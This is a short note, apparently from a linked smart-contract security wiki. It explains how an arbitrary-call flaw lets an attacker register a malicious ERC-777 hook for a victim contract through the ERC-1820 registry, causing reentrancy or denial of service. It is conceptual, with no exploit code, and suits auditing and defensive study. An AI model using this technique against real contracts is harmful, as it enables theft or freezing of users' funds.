ERC-777 arbitrary hook assignment via ERC-1820 registry enables attacker-controlled callbacks on victim contracts

# ERC-777 arbitrary hook assignment via ERC-1820 registry enables attacker-controlled callbacks on victim contracts ERC-777 uses the ERC-1820 registry to resolve hook addresses for any Ethereum address — both EOAs and contracts can register hook addresses for the `ERC777TokensSender` and `ERC777TokensRecipient` interfaces. Contracts that contain arbitrary call vulnerabilities (common in DEX aggregators and multicall contracts) can be exploited by an attacker to call `ERC1820Registry.setInterfaceImplementer()` on behalf of the victim contract, registering a malicious contract as the hook handler. After registration, every ERC-777 token transfer to or from the victim contract will invoke the attacker-controlled hook. The consequences are two-fold: the hook can trigger reentrancy into the victim contract while it is in a mid-transfer state, or the hook can revert every transfer, permanently denying service to any function that relies on ERC-777 token transfers. This attack vector is particularly dangerous for DEX aggregators and multicall systems that route arbitrary calls through their contracts. Since [[ERC-721 safeTransferFrom and ERC-777 tokensReceived callbacks create reentrancy entry points in any protocol handling these token standards]], the existing reentrancy risk from ERC-777 is amplified when the hook can be registered by an adversary rather than only by the contract's own developers. The indirection through the ERC-1820 registry means the hook assignment is a separate transaction that may not be monitored. --- Relevant Notes: - [[ERC-721 safeTransferFrom and ERC-777 tokensReceived callbacks create reentrancy entry points in any protocol handling these token standards]] — the foundational callback reentrancy risk this attack escalates - [[arbitrary storage writes enable attackers to overwrite critical variables when dynamic array slot calculations are manipulable]] — arbitrary call vulnerabilities enable storage manipulation in the same class of attack - [[access control vulnerabilities are the leading cause of smart contract financial losses]] — arbitrary call as an access control failure enabling registry manipulation Topics: - [[vulnerability-patterns]] - [[protocol-mechanics]]